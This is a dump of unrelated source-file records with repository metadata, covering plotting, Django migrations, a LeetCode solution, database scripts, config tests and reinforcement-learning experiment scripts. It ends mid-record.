] | zuojianyi@outlook.com |
599a5100c97cb2e4253e1355234bd786899eb985 | 3bec37b9145af3381f1bbc55745d3ef193694c46 | /presentation/performance/bimodal.py | 965f31acae633b21499c738a90af24fdf56d0dc8 | [] | no_license | nuria/study | c00fa8776514ba4343d9923a9e61af5482d7454c | 57ddbafc762da7c8756b475f016c92bf391bc370 | refs/heads/master | 2023-08-05T01:00:48.923046 | 2023-07-22T14:54:48 | 2023-07-22T14:54:48 | 7,290,586 | 5 | 20 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/local/bin/python
import matplotlib.pyplot as pl
x = [10,10,20,20,20,20,20, 30,30, 30, 30, 40, 40, 60,70, 70, 70, 70, 80, 80, 80, 80, 80, 90, 90, 100]
bins = [10,20,30,40,50,60,70,80,90,100]
pl.hist(x, bins, color=('pink'))
pl.ylim(ymax=6)
pl.title("Test Scores")
pl.xlabel("Score")
pl.show()
| [
"nuria@wikimedia.org"
] | nuria@wikimedia.org |
3846a652621902896625e7dd95b162936569cd06 | 7fb805dc0789bfa3bbac7a94b667548c01a8eb4a | /site-packages/warlock/__init__.py | 966b75d55f9e56c8f366ebc621f386734e4bee21 | [
"Python-2.0"
] | permissive | hclareth7/freezer_libraries | 8a6173140971679e5b5dc8428e1e56734f02d906 | e0bd890eba5e7438976fb3b4d66c41c128bab790 | refs/heads/master | 2022-11-30T02:19:46.718660 | 2019-05-29T20:29:20 | 2019-05-29T20:29:20 | 189,293,415 | 0 | 1 | NOASSERTION | 2022-11-17T05:38:07 | 2019-05-29T20:28:12 | Python | UTF-8 | Python | false | false | 713 | py | # Copyright 2012 Brian Waldon
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Public-facing Warlock API"""
from warlock.core import model_factory # NOQA
from warlock.exceptions import InvalidOperation # NOQA
| [
"root@ubuntu-14.04.general.micro.yul.linux.novalocal"
] | root@ubuntu-14.04.general.micro.yul.linux.novalocal |
6cb9fd58900ec505001f59b51e1c295c89baff3d | 6045075c734d65a3cec63d3ae15f8f9f13836559 | /solutions/0077_Combinations/recur_self.py | c534028c6b36b89e0714d0278ffe0c21c214e2c0 | [] | no_license | zh-wang/leetcode | c058470fdf84fb950e3d4f974b27826718942d05 | 6322be072e0f75e2da28b209c1dbb31593e5849f | refs/heads/master | 2021-12-28T02:49:11.964213 | 2021-08-25T06:29:21 | 2021-08-25T06:29:21 | 189,919,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
# combine(n, k) = combine(n-1, i-1) + [i], k <= i <= n
# 1. For the element we pick for combine(n, k),
# we can pick it from k to n, cause we need at least k elements to form the answer.
# (We know that the first, or minimal in sequence order, is 1, 2, ..., k)
# 2. After picker i, the problem falls down to a sub-problem combine(i-1, k-1),
# mean that we need to choose k-1 elements from i-1 values.
if k == 0:
return [[]]
return [pre + [i] for i in range(k, n+1) for pre in self.combine(i-1, k-1)]
| [
"viennakanon@gmail.com"
] | viennakanon@gmail.com |
3812936abe41673337ae02dc7f1dcaa153745673 | 5be8b0f2ee392abeee6970e7a6364ac9a5b8ceaa | /xiaojian/forth_phase/spider/day09/spider_day09_note_course/day09/Test/Test/proxies.py | fde6501a77012465746a28724407c37aa732ba45 | [] | no_license | Wellsjian/20180826 | 424b65f828f0174e4d568131da01dafc2a36050a | 0156ad4db891a2c4b06711748d2624080578620c | refs/heads/master | 2021-06-18T12:16:08.466177 | 2019-09-01T10:06:44 | 2019-09-01T10:06:44 | 204,462,572 | 0 | 1 | null | 2021-04-20T18:26:03 | 2019-08-26T11:38:09 | JavaScript | UTF-8 | Python | false | false | 65 | py | proxy_list = [
'http://1.1.1.1:1111',
'http://2.2.2.2:2222'
] | [
"1149158963@qq.com"
] | 1149158963@qq.com |
c9366d2c943f63b4c637c861fa71090d1af49555 | c91d029b59f4e6090a523bf571b3094e09852258 | /src/produto/migrations/0021_produtotamanho_descricao.py | d5cbafd682e15e63f33be66a3c4d365186036266 | [
"MIT"
] | permissive | anselmobd/fo2 | d51b63ebae2541b00af79448ede76b02638c41f0 | 8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab | refs/heads/master | 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 | MIT | 2023-04-21T21:50:46 | 2017-05-30T17:04:27 | Python | UTF-8 | Python | false | false | 503 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2019-04-29 19:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('produto', '0020_produtocor_descricao'),
]
operations = [
migrations.AddField(
model_name='produtotamanho',
name='descricao',
field=models.CharField(default='', max_length=200, verbose_name='descrição'),
),
]
| [
"anselmo.blanco.dominguez+github@gmail.com"
] | anselmo.blanco.dominguez+github@gmail.com |
a522239343b1e09f2c5134b508faa2f98456ebbb | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pandas/_config/config.py | 788bdbb89a23217a4a35e3dbccf570e3d3fa075f | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:947b386607f6b3f78c6e96a0c9aaa85d0fd62af2fb3fc31d67c95cfeec3e83d4
size 22977
| [
"github@cuba12345"
] | github@cuba12345 |
c1e07b3cd70a17a10d69eea452c3c3ded007a6d6 | f620403443b2c0affaed53505c002f35dc68020c | /StreamGeneration/GlobalSortByTime.py | 6ed5583c67de689562fa1d548b710d9c6a8cab7f | [] | no_license | ZhuJiahui/CTMTS | c552b3026deb47879f9aa5bde4b002cf6283858d | 9f8981f6e61900a68a38ae0392e01771beee9651 | refs/heads/master | 2021-01-12T10:18:27.579697 | 2016-12-14T02:23:29 | 2016-12-14T02:23:29 | 76,416,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,066 | py | # -*- coding: utf-8 -*-
'''
Created on 2014年7月22日
@author: ZhuJiahui506
'''
import os
import time
from operator import itemgetter
from TextToolkit import quick_write_list_to_text
def get_time_range(read_directory):
'''
最初时间与最后时间
:param read_directory:
'''
time_series = []
each_time_interval = []
#file_number = sum([len(files) for root, dirs, files in os.walk(read_directory)])
file_list = os.listdir(read_directory)
for i in range(len(file_list)):
print i
f = open(read_directory + '/' + file_list[i], 'rb')
line = f.readline()
this_time_series = []
while line:
this_time = time.mktime(time.strptime(line.strip().split('\t')[2], '%Y/%m/%d %H:%M'))
time_series.append(this_time)
this_time_series.append(this_time)
line = f.readline()
f.close()
each_time_interval.append([this_time_series[0], this_time_series[-1]])
#升序排序
time_series = sorted(time_series)
start_time = time_series[0]
final_time = time_series[-1]
print "The start time is: %f." % start_time
print "The final time is: %f." % final_time
return start_time, final_time, each_time_interval
def global_sort_by_time(start_time, final_time, each_time_interval, read_directory, write_directory):
print "Begin sorting."
print "May take a long time, Please Wait..."
file_list2 = os.listdir(read_directory)
#start_time = 1388505600 # 2014/01/01 0:00
start_time = int(start_time + 28800) / 86400 * 86400 - 28800
segment_interval = 86400 * 2
file_number = 1
while start_time <= final_time:
this_time_series = []
this_file_texts = []
print "Segment %d ." % file_number
for i in range(len(file_list2)):
if (start_time >= each_time_interval[i][0] and start_time <= each_time_interval[i][1]) or ((start_time + segment_interval) > each_time_interval[i][0] and (start_time + segment_interval) < each_time_interval[i][1]):
f = open(read_directory + '/' + file_list2[i], 'rb')
line = f.readline()
while line:
this_time = time.mktime(time.strptime(line.strip().split('\t')[2], '%Y/%m/%d %H:%M'))
if this_time < (start_time + segment_interval) and this_time >= start_time:
this_time_series.append(this_time)
this_file_texts.append(line.strip())
elif this_time >= (start_time + segment_interval):
break
else:
pass
line = f.readline()
f.close()
#文本获取完毕按时间排序
tt = zip(this_time_series, this_file_texts)
tt1 = sorted(tt, key = itemgetter(0))
this_file_texts = []
for each in tt1:
this_file_texts.append(each[1])
quick_write_list_to_text(this_file_texts, write_directory + "/" + str(file_number) + ".txt")
file_number = file_number + 1
start_time = start_time + segment_interval
print "Global Sort Complete!!!"
print "Total Segment %d ." % (file_number - 1)
if __name__ == '__main__':
start = time.clock()
now_directory = os.getcwd()
root_directory = os.path.dirname(now_directory) + '/'
read_directory = root_directory + u'dataset/original_data'
write_directory = root_directory + u'dataset/segment'
if (not(os.path.exists(write_directory))):
os.mkdir(write_directory)
start_time, final_time, each_time_interval = get_time_range(read_directory)
global_sort_by_time(start_time, final_time, each_time_interval, read_directory, write_directory)
print 'Total time %f seconds' % (time.clock() - start)
print 'Complete !!!'
| [
"zhujiahui@outlook.com"
] | zhujiahui@outlook.com |
3294126f04d6d5c3ee2390dfc9a57ecb73bc88e2 | 85af4750761974dd406edf614cfe74d0cfc5ba6f | /apps/users/migrations/0003_user_area.py | bd6e8ed903869ceabdc2691194afbe75c7dd7f5f | [] | no_license | Comunidad-de-Programadores/Team-Vue-14-Comfeco-Backend | ebdf9724b6963629c887370d2ddfb7ced072854e | e14856fe6d7b49289cd8cf4bca7e98556ec1ec96 | refs/heads/main | 2023-03-22T00:57:55.189866 | 2021-03-19T13:37:01 | 2021-03-19T13:37:01 | 337,901,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # Generated by Django 3.1.1 on 2021-03-06 05:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20210228_1300'),
]
operations = [
migrations.AddField(
model_name='user',
name='area',
field=models.CharField(choices=[('F', 'Frontend'), ('B', 'Backend'), ('D', 'Devops'), ('V', 'Video Gamer Developer'), ('UIX', 'UI/UX'), ('DB', 'Data Base Developer'), ('CC', 'Cloud Computing')], default='', max_length=255),
preserve_default=False,
),
]
| [
"danielhuamani15@gmail.com"
] | danielhuamani15@gmail.com |
3b4f675e1614fdb5809f39e201751cfadc0e0ad1 | 17248f16c4bf01b9b8257ba4855fb9d747bab100 | /windbgtool/debugger_load_breakpoints.py | 4cf7221dce572d52a6e2a50ec5afb20d89384a52 | [
"MIT"
] | permissive | fengjixuchui/windbgtool | 0d910596ab77c1482fbb8a9c82c381829baaa428 | 9dc759e983043ded2a8de143af24d94a3a4e4862 | refs/heads/master | 2020-08-17T14:57:48.968526 | 2019-10-17T06:02:19 | 2019-10-17T06:02:19 | 215,680,906 | 0 | 0 | MIT | 2019-10-17T06:02:22 | 2019-10-17T01:55:12 | null | UTF-8 | Python | false | false | 980 | py | import sys
import os
import logging
import windbgtool
from optparse import OptionParser, Option
parser = OptionParser(usage="usage: %prog [options] args")
parser.add_option("-b", "--breakpoint_db", dest="breakpoint_db", type="string", default="", metavar="BREAKPOINT_DB",
help="Breakpoint DB filename")
parser.add_option("-l", "--log", dest="log", type="string", default="", metavar="LOG", help="Log filename")
(options, args) = parser.parse_args(sys.argv)
root_dir = os.path.dirname(sys.argv[-3])
if options.breakpoint_db == '':
options.breakpoint_db = os.path.join(root_dir, 'bp.db')
if options.log == '':
options.log = os.path.join(root_dir, time.strftime("Record-%Y%m%d-%H%M%S.db"))
logging.basicConfig(level=logging.DEBUG)
root = logging.getLogger()
windbgtoolRun = windbgtool.Run()
# windbgtoolRun.SetSymbolPath()
if options.breakpoint_db:
windbgtoolRun.LoadBreakPoints(options.breakpoint_db, options.log)
windbgtoolRun.Continue()
| [
"oh.jeongwook@gmail.com"
] | oh.jeongwook@gmail.com |
5a98ae5a045a32ec3241b0ba03fe150df8ed8e90 | d5d7b0773d312545a0b36f72d119a3feae3c200b | /manage.py | 1d906eb32601e4c1065a1be1dd03f8f36f891566 | [] | no_license | princ3raj/advanceBlogApp | 0e23812a5ff27ad5bf2238422073a5ab45d4ae0a | ebed84f2899773cd15fb66f515f9f5787307056a | refs/heads/master | 2023-06-11T02:57:19.954941 | 2021-06-16T13:09:40 | 2021-06-16T13:09:40 | 298,969,263 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'advanceBlogApp.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"princ3raj1999@gmail.com"
] | princ3raj1999@gmail.com |
3a014455f400edcae05b46b534a82c2f547fa079 | be69a4f0093561a38449d717112ce94a7616e505 | /joulescope_ui/test/test_config.py | 1e346c9eba7c0754e605af629da6bbe677ae6325 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | adam-urbanczyk/pyjoulescope_ui | b0692178f4b4257427e97ce8e67b79279d6e04ba | fe5475c8d75b980b63dc3ec6d14f7de99e33efc1 | refs/heads/master | 2020-06-17T09:21:12.496697 | 2019-07-02T14:57:18 | 2019-07-02T14:57:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,596 | py | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the configuration file
"""
import unittest
import os
import io
import tempfile
import shutil
from joulescope_ui.config import load_config_def, load_config, save_config
MYPATH = os.path.dirname(os.path.abspath(__file__))
PATH = os.path.dirname(MYPATH)
def load_def():
path = os.path.join(PATH, 'config_def.json5')
return load_config_def(path)
class TestConfig(unittest.TestCase):
def test_load_config_def(self):
d = load_def()
self.assertIn('info', d)
self.assertIn('children', d)
def test_load_config_def_default(self):
d = load_config_def()
self.assertIn('info', d)
self.assertIn('children', d)
def test_file_not_found(self):
d = load_def()
c = load_config(d, '/path/to/nothing.json5')
self.assertIn('General', c)
self.assertIn('data_path', c['General'])
self.assertNotEqual('__APP_PATH__', c['General']['data_path'])
self.assertIn('Device', c)
self.assertIn('i_range', c['Device'])
self.assertEqual('auto', c['Device']['i_range'])
def test_load_filehandle(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': 'auto'}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('auto', c['Device']['i_range'])
def test_load_bad_option(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': '__invalid__'}}""".encode('utf-8'))
with self.assertRaises(ValueError):
c = load_config(d, f)
def test_load_default(self):
d = load_def()
f = io.BytesIO("""{'Device': {}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('auto', c['Device']['i_range'])
def test_load_alias(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': '2'}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('180 mA', c['Device']['i_range'])
def test_filename(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c = load_config(d, fname)
self.assertEqual('180 mA', c['Device']['i_range'])
class TestConfigSave(unittest.TestCase):
def setUp(self):
self._tempdir = tempfile.mkdtemp()
self._filename1 = os.path.join(self._tempdir, 'joulescope_config.json5')
def tearDown(self):
shutil.rmtree(self._tempdir)
def test_load_save_load_path(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c1 = load_config(d, fname)
save_config(c1, self._filename1)
c2 = load_config(d, self._filename1)
self.assertEqual(c1, c2)
def test_load_save_load_filehandle(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c1 = load_config(d, fname)
with open(self._filename1, 'w') as f:
save_config(c1, f)
with open(self._filename1, 'r') as f:
c2 = load_config(d, f)
self.assertEqual(c1, c2)
| [
"matt.liberty@jetperch.com"
] | matt.liberty@jetperch.com |
684aa470a21d1d3d0dabc09d2afaf2008ecf134c | eb56b01d5900db238bd94fc0283866575e37d8b5 | /aerobot/migrations/0014_delete_gallery.py | e5ee851484617a7b80075a25af3b3a77990afd64 | [] | no_license | prathmesh2048/Aerobots-Website | 43220db29a89edda059a34f8b7e3c14657103a4e | 9c11a5777b770df7aa4f8aec16e7c61f25419c0a | refs/heads/master | 2023-03-07T06:24:43.308905 | 2021-02-22T08:51:58 | 2021-02-22T08:51:58 | 292,319,707 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # Generated by Django 3.1 on 2020-09-03 10:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('aerobot', '0013_remove_gallery_link'),
]
operations = [
migrations.DeleteModel(
name='Gallery',
),
]
| [
"prathmeshnandurkar123@gmail.com"
] | prathmeshnandurkar123@gmail.com |
41ed640797d8b39a7645ff460aec3b52decb2d9d | 14a1c405bb1fe6fc7b5ccf4d6b8a2d042309ce93 | /tests/test_github_com.py | a41c327a607414f6008fddac4bec79d69c44f431 | [
"MIT"
] | permissive | the-dan/import_from_github_com | f067efd57edce46d83857101516188d5b6ce778d | 8fdd185b73835f637bb3e789d15e1ce13ff8f5cb | refs/heads/master | 2022-12-07T21:37:44.645946 | 2020-08-22T14:27:15 | 2020-08-22T14:27:15 | 288,563,107 | 0 | 0 | MIT | 2020-08-18T20:58:28 | 2020-08-18T20:58:27 | null | UTF-8 | Python | false | false | 284 | py | def test_import_module():
from github_com.kennethreitz import requests
assert requests.get('https://github.com').status_code == 200
def test_import_from_module():
from github_com.kennethreitz.requests import get
assert get('https://github.com').status_code == 200
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
d61d98030e8ca3ecbdbfec6fe7148c08a55779ed | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/5020/999005020.py | f972b49f11a222801df1d8cfa147f11ba02906ea | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 674 | py | from bots.botsconfig import *
from records005020 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'FA',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'AK1', MIN: 1, MAX: 1},
{ID: 'AK2', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'IK3', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'CTX', MIN: 0, MAX: 10},
{ID: 'IK4', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'CTX', MIN: 0, MAX: 10},
]},
]},
{ID: 'IK5', MIN: 1, MAX: 1},
]},
{ID: 'AK9', MIN: 1, MAX: 1},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
bdaeffeb33e535244e7fc70fc8248c8c9842f951 | f4663fe7fb660b62cca0c17bfd4c568bbc5bfb49 | /UNO-R3/examples/test_led.py | 485d9c10bf2ad38162d41e7e56ca6cc2675b1b70 | [] | no_license | mchobby/pyboard-driver | 274f0f90e895bdf6f80c27a716788e5a444c24d3 | 3fd45b81588d00479bf55d3dc7ea0ece3cb170de | refs/heads/master | 2023-04-26T14:27:11.323019 | 2023-04-13T21:37:50 | 2023-04-13T21:37:50 | 63,084,841 | 12 | 10 | null | 2022-11-27T19:35:00 | 2016-07-11T16:37:00 | Python | UTF-8 | Python | false | false | 430 | py | # Test the Neopixel present on the PYBOARD-UNO-R3 board
#
from uno import pixels
from time import sleep
led = pixels() # just one LED
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
led.fill( red )
led.write()
sleep(1)
led.fill( green )
led.write()
sleep(1)
led.fill( blue )
led.write()
sleep(1)
led.fill( (255,0,255) ) # Magenta
led.write()
sleep(1)
led.fill( (0,0,0) ) # Black
led.write()
print("That's all Folks!")
| [
"info@mchobby.be"
] | info@mchobby.be |
640aef9894f039267aba382904d3941646e285ee | f34dc191304f0c54527948aa7b7123fd6efe85b9 | /insert.py | cda7d978b6b817a7d459a0f2974143bf3c9060a9 | [] | no_license | sujith1919/groza | b3fc4641de48423da9a219c33e390ea2c4915687 | 5b68e052266d5307a0058d7031b3b20c4a1b9bcb | refs/heads/master | 2023-02-28T03:09:51.568592 | 2021-02-02T16:34:49 | 2021-02-02T16:34:49 | 335,353,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | #!/usr/bin/python
import psycopg2
from config import config
def connect():
""" Connect to the PostgreSQL database server """
conn = None
try:
# read connection parameters
params = config()
# connect to the PostgreSQL server
print('Connecting to the PostgreSQL database...')
conn = psycopg2.connect(**params)
# create a cursor
cur = conn.cursor()
# execute a statement
print('PostgreSQL database version:')
cur.execute('SELECT version()')
db_version1 = cur.fetchone()
print(db_version1)
# display the PostgreSQL database server version
cur.execute('SELECT * from LIFEBOAT')
db_version2 = cur.fetchone()
print(db_version2)
#cur.fetchall()
# close the communication with the PostgreSQL
#cur.execute("INSERT INTO LIFEBOAT (flag,hostname, nagios_status, dr_hostname, host_type) VALUES ('0','st13p29im-lifeboat002.me.com','staging','mr21p30im-lifeboat002.me.com','lifeboat')" )
#conn.commit()
cur.execute("SELECT * FROM LIFEBOAT where hostname='st13p29im-lifeboat033.me.com'")
cur.fetchall()
if cur.rowcount == 1:
cur.execute("UPDATE LIFEBOAT SET nagios_status=%s, kernel_version=%s where hostname='st13p29im-lifeboat033.me.com'" ,('staging','4.1.12-124.14.2.el6uek'))
conn.commit()
else:
print("insert")
cur.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
print('Database connection closed.')
if __name__ == '__main__':
connect()
| [
"jayarajan.sujith@oracle.com"
] | jayarajan.sujith@oracle.com |
58d53af289dac1c57d3dbf5b28b1bfc2f85b9999 | c9b787e405437ae35e7c3865d0fd59e97a9c5918 | /noveldl/modules/sources/__init__.py | c6f928aa43dcf6c35715b4dfd6488def3176b00b | [
"Apache-2.0"
] | permissive | CharlesPikachu/noveldl | 98944a85c1d0d05bb8eba80ef77b353eb4664289 | 37f0e27a2e1168884a83802c8808d6bc9cbfe8c0 | refs/heads/main | 2023-05-23T19:50:42.250136 | 2022-07-20T15:11:02 | 2022-07-20T15:11:02 | 487,217,661 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | '''initialize'''
from .zw81 import Zw81Novel
from .gebiqu import GeBiquNovel
from .xbiquge import XbiqugeNovel | [
"1159254961@qq.com"
] | 1159254961@qq.com |
43fd9e035ebf49370ede93a58cceb5a1a2df58a2 | 1c91439673c898c2219ee63750ea05ff847faee1 | /mmcls/models/heads/multi_label_linear_head.py | 0e9d0684a1b4aff4fa92ba807e550a4de98a6949 | [
"Apache-2.0"
] | permissive | ChenhongyiYang/GPViT | d7ba7f00d5139a989a999664ab0874c5c9d53d4d | 2b8882b2da41d4e175fe49a33fcefad1423216f4 | refs/heads/main | 2023-06-08T00:10:07.319078 | 2023-05-26T15:52:54 | 2023-05-26T15:52:54 | 577,075,781 | 78 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | # Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
from ..builder import HEADS
from .multi_label_head import MultiLabelClsHead
@HEADS.register_module()
class MultiLabelLinearClsHead(MultiLabelClsHead):
"""Linear classification head for multilabel task.
Args:
num_classes (int): Number of categories.
in_channels (int): Number of channels in the input feature map.
loss (dict): Config of classification loss.
init_cfg (dict | optional): The extra init config of layers.
Defaults to use dict(type='Normal', layer='Linear', std=0.01).
"""
def __init__(self,
num_classes,
in_channels,
loss=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
reduction='mean',
loss_weight=1.0),
init_cfg=dict(type='Normal', layer='Linear', std=0.01)):
super(MultiLabelLinearClsHead, self).__init__(
loss=loss, init_cfg=init_cfg)
if num_classes <= 0:
raise ValueError(
f'num_classes={num_classes} must be a positive integer')
self.in_channels = in_channels
self.num_classes = num_classes
self.fc = nn.Linear(self.in_channels, self.num_classes)
def pre_logits(self, x):
if isinstance(x, tuple):
x = x[-1]
return x
def forward_train(self, x, gt_label, **kwargs):
x = self.pre_logits(x)
gt_label = gt_label.type_as(x)
cls_score = self.fc(x)
losses = self.loss(cls_score, gt_label, **kwargs)
return losses
def simple_test(self, x, sigmoid=True, post_process=True):
"""Inference without augmentation.
Args:
x (tuple[Tensor]): The input features.
Multi-stage inputs are acceptable but only the last stage will
be used to classify. The shape of every item should be
``(num_samples, in_channels)``.
sigmoid (bool): Whether to sigmoid the classification score.
post_process (bool): Whether to do post processing the
inference results. It will convert the output to a list.
Returns:
Tensor | list: The inference results.
- If no post processing, the output is a tensor with shape
``(num_samples, num_classes)``.
- If post processing, the output is a multi-dimentional list of
float and the dimensions are ``(num_samples, num_classes)``.
"""
x = self.pre_logits(x)
cls_score = self.fc(x)
if sigmoid:
pred = torch.sigmoid(cls_score) if cls_score is not None else None
else:
pred = cls_score
if post_process:
return self.post_process(pred)
else:
return pred
| [
"chenhongyiyang@Chenhongyis-MacBook-Pro.local"
] | chenhongyiyang@Chenhongyis-MacBook-Pro.local |
d945fc30415b316e05bee88c5573d829ba4719b9 | 084a13b6524e21914826e842eeefefd09570a970 | /experiments/procgen_exploration/jumper/ppo_cnd_2_0.py | 9ac4ad7392e37ae8846941d8fc80871f8484960a | [
"MIT"
] | permissive | michalnand/reinforcement_learning | 28aa0e2c92b6112cf366eff0e0d6a78b9a56e94f | 01635014a37a4c871766b4cdd2caaa26a0c2d8cc | refs/heads/main | 2023-06-01T10:27:36.601631 | 2023-02-12T19:46:01 | 2023-02-12T19:46:01 | 217,841,101 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | import time
import torch
import RLAgents
import models.ppo_cnd_2_0.src.model_ppo as ModelPPO
import models.ppo_cnd_2_0.src.model_cnd_target as ModelCNDTarget
import models.ppo_cnd_2_0.src.model_cnd as ModelCND
import models.ppo_cnd_2_0.src.config as Config
#torch.cuda.set_device("cuda:1")
path = "models/ppo_cnd_2_0/"
config = Config.Config()
#config.envs_count = 1
envs = RLAgents.MultiEnvSeq("procgen-jumper-v0", RLAgents.WrapperProcgenExploration, config.envs_count)
#envs = RLAgents.MultiEnvSeq("procgen-jumper-v0", RLAgents.WrapperProcgenExplorationRender, config.envs_count)
agent = RLAgents.AgentPPOCND(envs, ModelPPO, ModelCNDTarget, ModelCND, config)
max_iterations = 500000
trainig = RLAgents.TrainingIterations(envs, agent, max_iterations, path, 128)
trainig.run()
'''
agent.load(path)
agent.disable_training()
episodes = 0
total_score = 0.0
reward_sum = 0.0
while True:
reward, done, info = agent.main()
#envs.render(0)
#agent.render(0)
reward_sum+= reward
if done:
episodes+= 1
total_score+= reward_sum
reward_sum = 0
print("DONE ", episodes, total_score/episodes)
''' | [
"michal.nand@gmail.com"
] | michal.nand@gmail.com |
498922c4b2af734bee8adc81ca0627c2f25b46c0 | f719ec76a8417fc05a2d46ada2501052e2bf9469 | /dicg/torch/baselines/__init__.py | 8d90ef326b8eee216b97735a1d2efda2c656eaca | [] | no_license | yang-xy20/DICG | cc31064a3e4a3dd01414161e42b228c2c09bfea7 | c64ba9dbbe0f2b745cd04ce516aa1fed4c2cffc7 | refs/heads/master | 2023-07-04T18:25:18.461196 | 2021-08-19T21:34:06 | 2021-08-19T21:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from dicg.torch.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from dicg.torch.baselines.dicg_critic import DICGCritic
from dicg.torch.baselines.attention_mlp_critic import AttentionMLPCritic
__all__ = [
'GaussianMLPBaseline',
'DICGCritic',
'AttentionMLPCritic',
] | [
"lisheng@stanford.edu"
] | lisheng@stanford.edu |
dd0b358353cfac1a73baa1e7653032b942731d2a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03479/s081451690.py | 2d434d0c722ffcf0dc82c9e9c3c1e7001d970560 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | X,Y = map(int,input().split())
ans = 0
for i in range(Y):
if X <= Y:
ans += 1
X *= 2
else:
break
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
a1c663679afc46149b4c75d89b9206ff3c6e50e4 | 3313c4750edaebd264108c6ee3e120bd583abde8 | /tools/cvpods_playground/fcos.dynamic.res50.1x.d8.tau-1_5.groups1.lambda-0/dynamic_conv.py | ca263cc90011e87d599675bbbaa6b70b5b0999a8 | [
